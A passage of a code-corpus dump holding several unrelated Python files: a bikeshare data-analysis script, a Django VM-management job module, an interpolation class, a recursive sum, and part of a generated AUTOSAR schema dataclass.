\"all\" for no day filter.')\n day = input().lower()\n while day not in day_list:\n print('Incorrect input: What day would you like to filter the data by? Type \"all\" for no month filter.')\n day = input().lower()\n\n print('Showing data for',city)\n print('Showing data for the month of', month, 'and the day =', day)\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n #load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n # extract hour from the Start Time column to create an hour column\n df['hour'] = df['Start Time'].dt.hour\n\n # create column of combination of start and end stations\n df['combination'] = df['Start Station'] + '-' + df['End Station']\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n # if only month of data then say month being displayed\n if len(np.unique(df['month'])) == 1:\n # print('This data is for the month of', month_list[df['month'][2]-1].capitalize())\n print('This data is for the month of', month_list[df['month'].mode()[0]-1].capitalize())\n else:\n # if all months selected then find most popular month\n print('Most common month for rides is', month_list[df['month'].mode()[0]-1].capitalize())\n\n # display the most common day of week\n # if only one day of data then say day being displayed\n if len(np.unique(df['day_of_week'])) == 1:\n print('This data is based off of', df['day_of_week'].mode()[0])\n else:\n # if all days selected then find most popular day\n print('Most common day of the week for rides is', df['day_of_week'].mode()[0])\n\n # display the most common start hour\n print('Most common start hour is', df['hour'].mode()[0])\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print('Most commonly used start station is:', df['Start Station'].mode()[0])\n\n # display most commonly used end station\n print('Most commonly used end station is:', df['End Station'].mode()[0])\n\n # display most frequent combination of start station and end station trip\n mostStart,mostEnd = df['combination'].mode()[0].split('-',1)\n print('\\n Most frequent combination of start station and end station:')\n print('\\t Start Station:', mostStart)\n print('\\t End Station:', mostEnd)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print(\"Total Travel Time:\", round(df['Trip Duration'].sum()/86400,2), 'days')\n\n # display mean travel time\n print(\"Average Travel Time:\", round(np.average(df['Trip Duration'])/60,2), 'minutes')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print('Counts of user types:')\n print(user_types)\n\n # Display counts of gender\n try:\n gender_count = df['Gender'].value_counts()\n print('\\nCounts of gender:')\n print(gender_count)\n except:\n print('No gender information to share')\n\n # Display earliest, most recent, and most common year of birth\n try:\n earliest_year = int(df['Birth Year'].min())\n recent_year = int(df['Birth Year'].max())\n most_year = int(df['Birth Year'].mode()[0])\n print('\\nRider with earliest birth year:', earliest_year)\n print('Rider with most recent birth year:', recent_year)\n print('Rider with most common birth year:', most_year)\n except:\n print('No birth year information to share for this city')\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n#option for the user to view 5 lines of raw data at a time\ndef rawdata(city):\n df = pd.read_csv(CITY_DATA[city])\n n = 3\n view = input('\\nWould you like to see the raw data? Enter yes or no.\\n')\n if view.lower() == 'yes':\n check = True\n print(df.iloc[0:n])\n n +=3\n else:\n check = False\n\n while check:\n view = input('\\nWould you like to continue seeing the raw data? Enter yes or no.\\n')\n if view.lower() == 'yes':\n check = True\n print(df.iloc[n-3:n])\n n +=3\n else:\n check = False\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n # df = load_data('washington', 'may', 'all')\n # print(df.head())\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n rawdata(city)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"504533920","text":"import subprocess\nimport time\nimport datetime\nfrom django.conf import settings\nfrom backstage.base import job_logger as logger\nfrom backstage.models import Host\nfrom backstage.models import Virtual\nfrom backstage.models import Images\nfrom backstage.models import RecycleBin\nfrom backstage.view.recycle_views import send_alert_message\nfrom .idc import update_idc\nfrom .host import update_host_from_cmdb\nfrom .images import down_process\nfrom .images import start_down\nfrom .images import md5_check\nfrom .report import report_cmdb\nfrom utils.host_requests import HostHandler\n\n\ndef do_action(action, params):\n \"\"\"\n * desc 异步操作\n \"\"\"\n cmd = ''\n if action == 'image_down':\n cmd = '%s %s/job/images.py start_down %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'create_vm':\n cmd = '%s %s/job/virtual.py create_vm %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'rename_vm':\n cmd = '%s %s/job/virtual.py rename_vm %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'reinstall_vm':\n cmd = '%s %s/job/virtual.py reinstall_vm %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n elif action == 'update_host_domain_status':\n cmd = '%s %s/job/host.py update_domain_status %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['ip'])\n elif action == 'update_resource':\n cmd = '%s %s/job/host.py update_resource %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['ip'])\n elif action == 'cmdb_report':\n cmd = '%s %s/job/report.py cmdb_report %s' % (settings.PYTHON_LIB,\n settings.BASE_DIR, params['id'])\n if cmd:\n subprocess.Popen(cmd, shell=True)\n\n\ndef report_cmdb_vm():\n \"\"\"\n * desc cmdb 上报的操作\n * input None\n * output None\n \"\"\"\n logger.info('job report_cmdb_vm start')\n virtual_list = Virtual.objects.filter(\n boot_check_status__in=[0, 2, 3, 4, 5], status__in=[0, 1, 2])\n for line in virtual_list:\n do_action('cmdb_report', {'id': line.id})\n logger.info('job report_cmdb_vm end')\n\n\ndef create_new_vm():\n \"\"\"\n * desc 创建虚拟机任务\n * input None\n * output None\n \"\"\"\n logger.info('job create_new_vm start')\n virtual_list = Virtual.objects.filter(status__in=[14, 15])\n for line in virtual_list:\n do_action('create_vm', {'id': line.id})\n logger.info('job create_new_vm end')\n\n\ndef check_domain_info():\n \"\"\"\n * desc 检测虚拟机的资源信息和数据库是否一致\n * input None\n * output None\n \"\"\"\n logger.info('job update_domain_info start')\n virtual_ip_list = []\n virtual_list = Virtual.objects.all()\n for line in virtual_list:\n try:\n flag = 1\n host_handler = HostHandler(line.host_ip)\n domain_info = host_handler.get_domain_resource(line.name)\n if int(domain_info['cpu']) != int(line.cpu):\n flag = 0\n if int(domain_info['maxMem']) != int(line.memory):\n flag = 0\n if int(domain_info['disks']['dev_num']) != int(line.disk_num):\n flag = 0\n if int(domain_info['disks']['total']) != int(line.disk):\n flag = 0\n if not flag:\n virtual_ip_list.append(line.name)\n except Exception as e:\n logger.error(str(e))\n if virtual_ip_list:\n message = 'ip ' + ','.join(virtual_ip_list) + '资源与数据库对应不上'\n send_report_message(message)\n logger.info('job update_domain_info end')\n\n\ndef check_host_domain():\n \"\"\"\n * desc 校验宿主机上面的虚拟机是否和数据库一致\n * input None\n * output None\n \"\"\"\n logger.info('job check_host_domain start')\n host_ip_list = Virtual.objects.distinct().values('host_ip')\n for host_info in host_ip_list:\n host_ip = host_info['host_ip']\n host_handler = HostHandler(host_ip)\n try:\n host_domain_list = host_handler.host_domain_list()\n domain_list = host_domain_list.keys()\n virtual_db = Virtual.objects.filter(status__in=[0, 1, 2, 3, 4, 5])\n virtual_name_list = [line.name for line in virtual_db]\n if set(domain_list) != set(virtual_name_list):\n domain_message = ','.join(domain_list)\n virtual_message = ','.join(virtual_name_list)\n send_report_message(\n '宿主机%s虚拟机对应不起来 数据库记录的虚拟机为 %s 接口返回的虚拟机是 %s' % (\n host_ip, domain_message, virtual_message))\n except Exception as e:\n logger.error('check_host_domain job error info is %s' % str(e))\n pass\n logger.info('job check_host_domain end')\n\n\ndef update_host_resource():\n \"\"\"\n * desc 更新宿主机资源信息\n * input None\n * output None\n \"\"\"\n logger.info('job update_host_resource start')\n host_list = Host.objects.filter(\n ready_status=2).distinct().values(\"minion_id\")\n for minion_info in host_list:\n if not minion_info['minion_id']:\n continue\n time.sleep(0.3)\n do_action('update_resource', {'ip': minion_info['minion_id']})\n logger.info('job update_host_resource end')\n\n\ndef update_host_domain_status():\n \"\"\"\n * desc 更新宿主机上面的所有的虚拟机的信息\n * input None\n * output None\n \"\"\"\n logger.info('job update_host_domain_status start')\n host_ip_list = Virtual.objects.distinct().values(\"host_ip\")\n for host_info in host_ip_list:\n if not host_info['host_ip']:\n continue\n time.sleep(0.3)\n do_action('update_host_domain_status', {'ip': host_info['host_ip']})\n logger.info('job update_host_domain_status end')\n\n\ndef check_delete_virtual():\n \"\"\"\n * desc 检测删除虚拟机\n * input None\n * output None\n \"\"\"\n logger.info('job check_delete_virtual start')\n delete_vm_list = RecycleBin.objects.all()\n for line in delete_vm_list:\n delete_date = line.delete_date\n now = datetime.datetime.now()\n date = delete_date - now\n if date.days > 0:\n # 删除的时间 还以天为单位的计算\n message_day = [1, 2, 3, 7]\n if date.days in message_day:\n # 检测 当天是否已经发送过消息\n send_alert_message(line, date.days, is_day=1)\n elif date.days == 0:\n # 最后七个小时再去发送一次邮件\n hours = int(date.seconds / 3600)\n if hours in [7, 3, 5, 4, 2]:\n send_alert_message(line, hours, is_day=0)\n else:\n # 时间已经过了 执行删除操作\n try:\n status = line.virtual.status\n if status != 9:\n continue\n # 删除物理文件\n host_handler = HostHandler(line.virtual.host_ip)\n host_handler.remove_delete_vm(line.virtual.name)\n # 删除回收站内容\n line.delete()\n # 删除虚拟机表数据\n Virtual.objects.filter(id=line.virtual_id).delete()\n except Exception as ex:\n message = '虚拟机 %s 删除失败 失败原因: \\n' % line.virtual.name + str(ex)\n send_report_message(message)\n logger.info('job check_delete_virtual end')\n\n\ndef update_idc_from_cmdb():\n \"\"\"\n * desc 从cmdb更新机房信息\n * input None\n * output None\n \"\"\"\n logger.info('job update_idc_from_cmdb start')\n update_idc()\n logger.info('job update_idc_from_cmdb end')\n\n\ndef update_hosts_from_cmdb():\n \"\"\"\n * desc 从cmdb更新宿主机信息\n * input None\n * output None\n \"\"\"\n logger.info('job update_hosts_from_cmdb start')\n update_host_from_cmdb()\n logger.info('job update_hosts_from_cmdb end')\n\n\ndef check_down_process():\n \"\"\"\n * desc 检测正在下载的镜像并更新下载进度\n * input None\n * output None\n \"\"\"\n logger.info('job check_down_process start')\n down_process()\n logger.info('job check_down_process end')\n\n\ndef check_start_down():\n \"\"\"\n * desc 检测是否有需要下载的镜像文件\n * input None\n * output None\n \"\"\"\n logger.info('job check_start_down start')\n image_db = Images.objects.filter(status=2)\n for line in image_db:\n start_down(line.id)\n logger.info('job check_start_down end')\n\n\ndef check_md5_check():\n \"\"\"\n * desc md5的校验\n * input None\n * output None\n \"\"\"\n logger.info('job check_md5_check start')\n md5_check()\n logger.info('job check_md5_check end')\n","sub_path":"python/vir_manager/job/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"557856668","text":"class interpolation:\n\n def linear_interpolation(self, pt1, pt2, unknown):\n \"\"\"Computes the linear interpolation for the unknown values using pt1 and pt2\n take as input\n pt1: known point pt1 and f(pt1) or intensity value\n pt2: known point pt2 and f(pt2) or intensity value\n unknown: take and unknown location\n return the f(unknown) or intentity at unknown\"\"\"\n\n #Write your code for linear interpolation here\n pt1,intensity1=pt1\n pt2,intensity2=pt2\n newPoint=unknown\n intensity_diff=pt2-pt1\n if(intensity_diff<=0):\n intensity_diff=1\n\n a1=pt2-newPoint\n b1=a1/intensity_diff\n x=intensity1*b1\n a2=newPoint - pt1\n b2=a2/intensity_diff\n y=intensity2*b2\n new_intensity=x+y\n\n return new_intensity\n\n def bilinear_interpolation(self, pt1, pt2, pt3, pt4, unknown):\n \"\"\"Computes the linear interpolation for the unknown values using pt1 and pt2\n take as input\n pt1: known point pt1 and f(pt1) or intensity value\n pt2: known point pt2 and f(pt2) or intensity value\n pt1: known point pt3 and f(pt3) or intensity value\n pt2: known point pt4 and f(pt4) or intensity value\n unknown: take and unknown location\n return the f(unknown) or intentity at unknown\"\"\"\n\n # Write your code for bilinear interpolation here\n # May b you can reuse or call linear interpolatio method to compute this task\n \n X1,Y1, intensity1 = pt1\n X2,Y2, intensity2 = pt2\n X3,Y3, intensity3 = pt3\n X4,Y4, intensity4 = pt4\n newPointX1,newPointY1 = unknown\n\n newpt1=self.linear_interpolation((X1,intensity1),(X2,intensity2),newPointX1)\n newpt2=self.linear_interpolation((X3,intensity3),(X4,intensity4),newPointX1)\n newpt1=Y1,newpt1\n newpt2=Y4,newpt2\n intensity=self.linear_interpolation(newpt1,newpt2,newPointY1)\n \n \n\n return intensity\n","sub_path":"resize/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"227485651","text":"def sum(arr):\n \"\"\"再帰を使って合計値を算出\n\n Args:\n arr ([type]): [description]\n\n Returns:\n [type]: [description]\n \"\"\"\n if len(arr) < 1:\n return 0\n else:\n return arr[0] + sum(arr[1:])\n\n\nprint(sum([1, 2, 3, 4, 5 ]))\n","sub_path":"algorithm/chap_04/Sum2.py","file_name":"Sum2.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"549527611","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom .annotation import (\n AdminData,\n Annotation,\n DocumentationBlock,\n VariationPoint,\n)\nfrom .assembly_sw_connector import AssemblySwConnector\nfrom .blueprint_policy_list import BlueprintPolicyList\nfrom .blueprint_policy_not_modifiable import BlueprintPolicyNotModifiable\nfrom .blueprint_policy_single import BlueprintPolicySingle\nfrom .category_string import CategoryString\nfrom .consistency_needs import ConsistencyNeeds\nfrom .constant_specification_mapping_set_subtypes_enum import ConstantSpecificationMappingSetSubtypesEnum\nfrom .data_type_mapping_set_subtypes_enum import DataTypeMappingSetSubtypesEnum\nfrom .delegation_sw_connector import DelegationSwConnector\nfrom .identifier import Identifier\nfrom .instantiation_timing_event_props import InstantiationTimingEventProps\nfrom .multi_language_overview_paragraph import MultiLanguageOverviewParagraph\nfrom .multilanguage_long_name import MultilanguageLongName\nfrom .p_port_prototype import PPortPrototype\nfrom .pass_through_sw_connector import PassThroughSwConnector\nfrom .port_group import PortGroup\nfrom .pr_port_prototype import PrPortPrototype\nfrom .r_port_prototype import RPortPrototype\nfrom .ref import Ref\nfrom .short_name_fragment import ShortNameFragment\nfrom .string import String\nfrom .sw_component_documentation import SwComponentDocumentation\nfrom .sw_component_prototype import SwComponentPrototype\nfrom .unit_group_subtypes_enum import UnitGroupSubtypesEnum\n\n__NAMESPACE__ = \"http://autosar.org/schema/r4.0\"\n\n\n@dataclass\nclass CompositionSwComponentType:\n \"\"\"A CompositionSwComponentType aggregates SwComponentPrototypes (that in turn\n are typed by SwComponentTypes) as well as SwConnectors for primarily connecting\n SwComponentPrototypes among each others and towards the surface of the\n CompositionSwComponentType.\n\n By this means hierarchical structures of software-components can be\n created.\n\n :ivar short_name: This specifies an identifying shortName for the\n object. It needs to be unique within its context and is intended\n for humans but even more for technical reference.\n :ivar short_name_fragments: This specifies how the\n Referrable.shortName is composed of several shortNameFragments.\n :ivar long_name: This specifies the long name of the object. Long\n name is targeted to human readers and acts like a headline.\n :ivar desc: This represents a general but brief (one paragraph)\n description what the object in question is about. It is only one\n paragraph! Desc is intended to be collected into overview\n tables. This property helps a human reader to identify the\n object in question. More elaborate documentation, (in particular\n how the object is built or used) should go to \"introduction\".\n :ivar category: The category is a keyword that specializes the\n semantics of the Identifiable. It affects the expected existence\n of attributes and the applicability of constraints.\n :ivar admin_data: This represents the administrative data for the\n identifiable object.\n :ivar introduction: This represents more information about how the\n object in question is built or is used. Therefore it is a\n DocumentationBlock.\n :ivar annotations: Possibility to provide additional notes while\n defining a model element (e.g. the ECU Configuration Parameter\n Values). These are not intended as documentation but are mere\n design notes.\n :ivar variation_point: This element was generated/modified due to an\n atpVariation stereotype.\n :ivar blueprint_policys: This role indicates whether the\n blueprintable element will be modifiable or not motifiable.\n :ivar short_name_pattern: This attribute represents the pattern\n which shall be used to build the shortName of the derived\n elements. As of now it is modeled as a String. In general it\n should follow the pattern: pattern = (placeholder | namePart)*\n placeholder = \"{\" namePart \"}\" namePart = identifier | \"_\" This\n is subject to be refined in subsequent versions. Note that this\n is marked as obsolete. Use the xml attribute namePattern instead\n as it applies to Identifier and CIdentifier (shortName, symbol\n etc.)\n :ivar sw_component_documentations: This adds a documentation to the\n SwComponentType. The upper multiplicity of this role has been\n increased to * due to resolving an atpVariation stereotype. The\n previous value was 1.\n :ivar consistency_needss: This represents the collection of\n ConsistencyNeeds owned by the enclosing SwComponentType. The\n upper multiplicity of this role has been increased to * due to\n resolving an atpVariation stereotype. The previous value was -1.\n :ivar ports: The PortPrototypes through which this SwComponentType\n can communicate. The aggregation of PortPrototype is subject to\n variability with the purpose to support the conditional\n existence of PortPrototypes. The upper multiplicity of this role\n has been increased to * due to resolving an atpVariation\n stereotype. The previous value was -1.\n :ivar port_groups: A port group being part of this component. The\n upper multiplicity of this role has been increased to * due to\n resolving an atpVariation stereotype. The previous value was -1.\n :ivar unit_group_refs: This allows for the specification of which\n UnitGroups are relevant in the context of referencing\n SwComponentType.\n :ivar components: @RESTRICT_TO_STANDARD:CP! The instantiated\n components that are part of this composition. The aggregation of\n SwComponentPrototype is subject to variability with the purpose\n to support the conditional existence of a SwComponentPrototype.\n Please be aware: if the conditional existence of\n SwComponentPrototypes is resolved post-build the deselected\n SwComponentPrototypes are still contained in the ECUs build but\n the instances are inactive in in that they are not scheduled by\n the RTE. The aggregation is marked as atpSplitable in order to\n allow the addition of service components to the ECU extract\n during the ECU integration. The use case for having 0 components\n owned by the CompositionSwComponentType could be to deliver an\n empty CompositionSwComponentType to e.g. a supplier for filling\n the internal structure. @END_RESTRICT_TO_STANDARD!\n @RESTRICT_TO_STANDARD:AP! The instantiated components that are\n part of this composition. @END_RESTRICT_TO_STANDARD! The upper\n multiplicity of this role has been increased to * due to\n resolving an atpVariation stereotype. The previous value was -1.\n :ivar connectors: SwConnectors have the principal ability to\n establish a connection among PortPrototypes. They can have many\n roles in the context of a CompositionSwComponentType. Details\n are refined by subclasses. The aggregation of SwConnectors is\n subject to variability with the purpose to support variant data\n flow. @RESTRICT_TO_STANDARD:CP:AP! The aggregation is marked as\n atpSplitable in order to allow the extension of the ECU extract\n with AssemblySwConnectors between ApplicationSwComponentTypes\n and ServiceSwComponentTypes during the ECU integration.\n @END_RESTRICT_TO_STANDARD! The upper multiplicity of this role\n has been increased to * due to resolving an atpVariation\n stereotype. The previous value was -1.\n :ivar constant_value_mapping_refs: Reference to the\n ConstantSpecificationMapping to be applied for initValues of\n PPortComSpecs and RPortComSpec.\n :ivar data_type_mapping_refs: @RESTRICT_TO_STANDARD:CP! Reference to\n the DataTypeMapping to be applied for the used\n ApplicationDataTypes in PortInterfaces. Background: when\n developing subsystems it may happen that ApplicationDataTypes\n are used on the surface of CompositionSwComponentTypes. In this\n case it would be reasonable to be able to also provide the\n intended mapping to the ImplementationDataTypes. However, this\n mapping shall be informal and not technically binding for the\n implementors mainly because the RTE generator is not concerned\n about the CompositionSwComponentTypes. Rationale: if the mapping\n of ApplicationDataTypes on the delegated and inner PortPrototype\n matches then the mapping to ImplementationDataTypes is not\n impacting compatibility. @END_RESTRICT_TO_STANDARD!\n @RESTRICT_TO_STANDARD:AP! Reference to the DataTypeMapping to be\n applied for the used ApplicationDataTypes in ServiceInterfaces.\n @END_RESTRICT_TO_STANDARD!\n :ivar instantiation_rte_event_propss: This allows to define\n instantiation specific properties for RTE Events, in particular\n for instance specific scheduling. The upper multiplicity of this\n role has been increased to * due to resolving an atpVariation\n stereotype. The previous value was -1.\n :ivar s: Checksum calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine if\n an ArObject has changed. The checksum has no semantic meaning\n for an AUTOSAR model and there is no requirement for AUTOSAR\n tools to manage the checksum.\n :ivar t: Timestamp calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine\n the last change of an ArObject. The timestamp has no semantic\n meaning for an AUTOSAR model and there is no requirement for\n AUTOSAR tools to manage the timestamp.\n :ivar uuid: The purpose of this attribute is to provide a globally\n unique identifier for an instance of a meta-class. The values of\n this attribute should be globally unique strings prefixed by the\n type of identifier. For example, to include a DCE UUID as\n defined by The Open Group, the UUID would be preceded by \"DCE:\".\n The values of this attribute may be used to support merging of\n different AUTOSAR models. The form of the UUID (Universally\n Unique Identifier) is taken from a standard defined by the Open\n Group (was Open Software Foundation). This standard is widely\n used, including by Microsoft for COM (GUIDs) and by many\n companies for DCE, which is based on CORBA. The method for\n generating these 128-bit IDs is published in the standard and\n the effectiveness and uniqueness of the IDs is not in practice\n disputed. If the id namespace is omitted, DCE is assumed. An\n example is \"DCE:2fac1234-31f8-11b4-a222-08002b34c003\". The uuid\n attribute has no semantic meaning for an AUTOSAR model and there\n is no requirement for AUTOSAR tools to manage the timestamp.\n \"\"\"\n class Meta:\n name = \"COMPOSITION-SW-COMPONENT-TYPE\"\n\n short_name: Optional[Identifier] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n \"required\": True,\n }\n )\n short_name_fragments: Optional[\"CompositionSwComponentType.ShortNameFragments\"] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME-FRAGMENTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n long_name: Optional[MultilanguageLongName] = field(\n default=None,\n metadata={\n \"name\": \"LONG-NAME\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n desc: Optional[MultiLanguageOverviewParagraph] = field(\n default=None,\n metadata={\n \"name\": \"DESC\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n category: Optional[CategoryString] = field(\n default=None,\n metadata={\n \"name\": \"CATEGORY\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n admin_data: Optional[AdminData] = field(\n default=None,\n metadata={\n \"name\": \"ADMIN-DATA\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n introduction: Optional[DocumentationBlock] = field(\n default=None,\n metadata={\n \"name\": \"INTRODUCTION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n annotations: Optional[\"CompositionSwComponentType.Annotations\"] = field(\n default=None,\n metadata={\n \"name\": \"ANNOTATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n variation_point: Optional[VariationPoint] = field(\n default=None,\n metadata={\n \"name\": \"VARIATION-POINT\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n blueprint_policys: Optional[\"CompositionSwComponentType.BlueprintPolicys\"] = field(\n default=None,\n metadata={\n \"name\": \"BLUEPRINT-POLICYS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n short_name_pattern: Optional[String] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-NAME-PATTERN\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n sw_component_documentations: Optional[\"CompositionSwComponentType.SwComponentDocumentations\"] = field(\n default=None,\n metadata={\n \"name\": \"SW-COMPONENT-DOCUMENTATIONS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n consistency_needss: Optional[\"CompositionSwComponentType.ConsistencyNeedss\"] = field(\n default=None,\n metadata={\n \"name\": \"CONSISTENCY-NEEDSS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n ports: Optional[\"CompositionSwComponentType.Ports\"] = field(\n default=None,\n metadata={\n \"name\": \"PORTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n port_groups: Optional[\"CompositionSwComponentType.PortGroups\"] = field(\n default=None,\n metadata={\n \"name\": \"PORT-GROUPS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n unit_group_refs: Optional[\"CompositionSwComponentType.UnitGroupRefs\"] = field(\n default=None,\n metadata={\n \"name\": \"UNIT-GROUP-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n components: Optional[\"CompositionSwComponentType.Components\"] = field(\n default=None,\n metadata={\n \"name\": \"COMPONENTS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n connectors: Optional[\"CompositionSwComponentType.Connectors\"] = field(\n default=None,\n metadata={\n \"name\": \"CONNECTORS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n constant_value_mapping_refs: Optional[\"CompositionSwComponentType.ConstantValueMappingRefs\"] = field(\n default=None,\n metadata={\n \"name\": \"CONSTANT-VALUE-MAPPING-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n data_type_mapping_refs: Optional[\"CompositionSwComponentType.DataTypeMappingRefs\"] = field(\n default=None,\n metadata={\n \"name\": \"DATA-TYPE-MAPPING-REFS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n instantiation_rte_event_propss: Optional[\"CompositionSwComponentType.InstantiationRteEventPropss\"] = field(\n default=None,\n metadata={\n \"name\": \"INSTANTIATION-RTE-EVENT-PROPSS\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n s: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"S\",\n \"type\": \"Attribute\",\n }\n )\n t: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"T\",\n \"type\": \"Attribute\",\n \"pattern\": r\"([0-9]{4}-[0-9]{2}-[0-9]{2})(T[0-9]{2}:[0-9]{2}:[0-9]{2}(Z|([+\\-][0-9]{2}:[0-9]{2})))?\",\n }\n )\n uuid: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"UUID\",\n \"type\": \"Attribute\",\n }\n )\n\n @dataclass\n class ShortNameFragments:\n short_name_fragment: List[ShortNameFragment] = field(\n default_factory=list,\n metadata={\n \"name\": \"SHORT-NAME-FRAGMENT\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class Annotations:\n annotation: List[Annotation] = field(\n default_factory=list,\n metadata={\n \"name\": \"ANNOTATION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class BlueprintPolicys:\n blueprint_policy_list: List[BlueprintPolicyList] = field(\n default_factory=list,\n metadata={\n \"name\": \"BLUEPRINT-POLICY-LIST\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n blueprint_policy_not_modifiable: List[BlueprintPolicyNotModifiable] = field(\n default_factory=list,\n metadata={\n \"name\": \"BLUEPRINT-POLICY-NOT-MODIFIABLE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n blueprint_policy_single: List[BlueprintPolicySingle] = field(\n default_factory=list,\n metadata={\n \"name\": \"BLUEPRINT-POLICY-SINGLE\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n @dataclass\n class SwComponentDocumentations:\n sw_component_documentation: List[SwComponentDocumentation] = field(\n default_factory=list,\n metadata={\n \"name\": \"SW-COMPONENT-DOCUMENTATION\",\n \"type\": \"Element\",\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n }\n )\n\n 